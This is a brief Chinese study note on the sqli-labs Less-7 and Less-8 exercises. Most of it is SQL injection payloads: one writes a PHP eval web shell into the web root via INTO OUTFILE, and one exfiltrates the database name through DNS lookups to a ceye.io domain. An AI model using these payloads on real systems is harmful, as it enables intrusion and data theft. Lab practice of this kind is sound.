less7-less8

less 7  是上传文件

前提是要修改mysql 数据库配置文件my.ini 

参数secure_file_priv=''

payload

http://192.168.1.30/sqli-labs-master/Less-7/?id=2')) union select 1,2,3 into outfile? "C:\\php\\WWW\\sqli-labs-master\\Less-7\\test.txt"--+

写入 一句话木马

http://192.168.1.30/sqli-labs-master/Less-7/?id=2')) union select 1,2,"<?php eval($_POST["cmd"]);?>" into outfile "C:\\php\\WWW\\sqli-labs-master\\Less-7\\test4.php"--+

less 8 是 布尔盲注直接用sqlmap 跑

在网上找到对注入新的玩法，利用dnslog进行注入

前提也是数据库能读写文件

http://192.168.1.30/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select database()),'.xxxx.ceye.io\\abc'))),1,1)--+

按我理解就是发送请求给服务器，数据库调用load_file函数，在本地找不到相关对象，就会访问域名服务器，访问域名服务器，域名服务器就会收到信息。